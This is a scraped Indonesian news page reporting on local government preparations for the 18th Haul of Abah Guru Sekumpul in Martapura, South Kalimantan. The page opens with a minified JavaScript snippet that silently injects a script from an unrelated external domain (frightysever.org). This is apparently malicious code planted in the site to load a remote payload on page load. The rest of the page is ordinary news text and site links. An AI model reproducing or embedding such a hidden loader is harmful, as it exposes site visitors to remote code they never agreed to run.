(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Banjar

Jelang Haul Akbar Guru Sekumpul, Pemkab Banjar Siapkan Tempat untuk Tempat Istirahat Jemaah


KANALKALIMANTAN.COM, MARTAPURA
Seluruh pihak berkoordinasi dalam memastikan kesiapan Haul Ke-18 Abah Guru Sekumpul yang digelar Kamis (25/1/2023) nanti di Kecamatan Martapura Timur, Kabupaten Banjar, Kalimantan Selatan.

Badan Penanggulangan Bencana Daerah (BPBD) Provinsi dan Kabupaten Banjar berkoordinasi melakukan pemasangan tandon air untuk keperluan wudhu jemaah haul Ke-18 Abah Guru Sekumpul yang akan digelar.

Selain itu juga menyediakan perahu karet, ambulans serta spead boat dan beberapa persiapan lainnya yang masih berjalan ditargetkan rampung Selasa (24/1/2023) mendatang.

Hal tersebut disampaikan Asisten Bidang Perekonomian dan Pembangunan Setda Banjar Ikhwansyah, saat mengikuti rapat pemantapan haul akbar di Gedung Idham Chalid, Banjarbaru, Jumat (20/1/2023) siang.

 

Suasana rapat pemantapan haul akbar di Gedung Idham Chalid, Banjarbaru. Foto: DKISP Banjar

Baca juga  : Haul ke-18 Sekumpul di Kampung Keramat, BPAM Banjarbakula Siap Suplai Air Bersih

Ikhwansyah juga meminta informasi final perkiraan jumlah jemaah, termasuk tamu VIP dan VVIP, guna Hal memudahkan pihak yang melaksanakan perencanaan rekayasa lalu lintas.

“Beberapa tempat di perkantoran Setda Banjar semisal aula juga kami siapkan untuk dijadikan tempat istirahat.

Pada dasarnya Pemkab Banjar mendukung penuh kegiatan dan selalu siap bekerjasama dengan pihak Provinsi Kalsel,” tegas Ikhwansyah.

Hal lain yang dibahas adalah peran Dinas Kominfo dalam menyebarluaskan informasi terkait haul serta rencana penyiaran live streaming melalui tv, youtube, radio yang terpusat melalui arahan Dinas Kominfo Provinsi untuk kemudian juga disebarluaskan secara rellay oleh Kominfo Kabupaten Banjar dan Kota Banjarbaru.

Baca juga  : Ini Tonase Sampah Warga Ibu Kota Kalsel per Hari, DLH Banjarbaru Operasikan 48 Truk Angkut

Rencananya, Selasa (24/1/2023) Kominfo Provinsi Kalsel melakukan pemasangan alat dan uji coba streaming di kediaman Paman Birin di Desa Keramat Baru, Martapura Timur.

Sebelumnya pada 18 Januari Diskominfo telah melakukan survei jaringan di lokasi bersama PT Telkom, kemudian pihak PT Telkom telah mengupgrade jaringan di kediaman Paman Birin di Desa Keramat dari Indihome ke Astinet dengan kecepatan 100:100 Mbps.

Menjadi perhatian utama di haul akbar ini rencananya (masih tahap konfirmasi) jika tak ada aral, akan dihadiri Wakil Presiden  Ma’ruf Amin. Skenario rekayasa lalu lintas tamu VVIP tersebut akan dibahas pada rapat khusus.

Rapat pemantapan ini dipimpin Sekdaprov Kalsel Roy Rizali Anwar, antara lain juga dihadiri Kastaf Korem 101 Antasari, perwakilan Polda Kalsel, perwakilan Kanwil Kemenag Provinsi Kalsel, beberapa kepala dinas Provinsi Kalsel, Kabupaten Banjar dan Kota Banjarbaru, Camat Martapura Timur dan Barat, Pambakal se Martapura Timur serta relawan. (Kanalkalimantan.com/rls)

Reporter : Rls
Editor : Dhani


Desy Arfianty

Recent Posts

Golkar Banjarbaru Buka Penjaringan Bakal Calon Wali Kota

KANALKALIMANTAN.COM, BANJARBARU - DPD Partai Golkar Kota Banjarbaru membuka pendaftaran bakal calon Wali Kota dan… Read More

7 menit ago

Soal Pungutan Acara Perpisahan Siswa, Ini Kata Ketua DPRD Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Dewan Perwakilan Rakyat Daerah (DPRD) Kota Banjarbaru menyikapi persoalan iuran kegiatan acara… Read More

3 jam ago

Pungutan Acara Perpisahaan Siswa, Begini Respon Wali Kota Aditya

KANALKALIMANTAN.COM, BANJARBARU – Menyikapi pungutan acara perpisahan siswa sekolah di Banjarbaru, Wali Kota Banjarbaru Aditya… Read More

4 jam ago

Orangtua Pusing, ‘Bermewah-mewahan’ Perpisahan Anak Sekolah di Banjarbaru

Kadisdik: Silakan Perpisahan di Sekolah dan Dilakukan dengan Sederhana Read More

15 jam ago

Bappedalitbang Banjar Gelar Rapat Pembahasan Data Indikator Makro Pembangunan RPJPD

KANALKALIMANTAN.COM, MARTAPURA – Badan Perencanaan Pembangunan Daerah, Penelitian dan Pengembangan (Bappedalitbang) Kabupaten Banjar melaksanakan rapat Pembahasan… Read More

15 jam ago

Pergantian Perwira di Polres Banjarmasin, Ini Nama dan Jabatannya

KANALKALIMANTAN.COM, BANJARMASIN - Sejumlah perwira menengah (Pamen) dan perwira pertama (Pama) di lingkungan Kepolisian Resor… Read More

15 jam ago

This website uses cookies.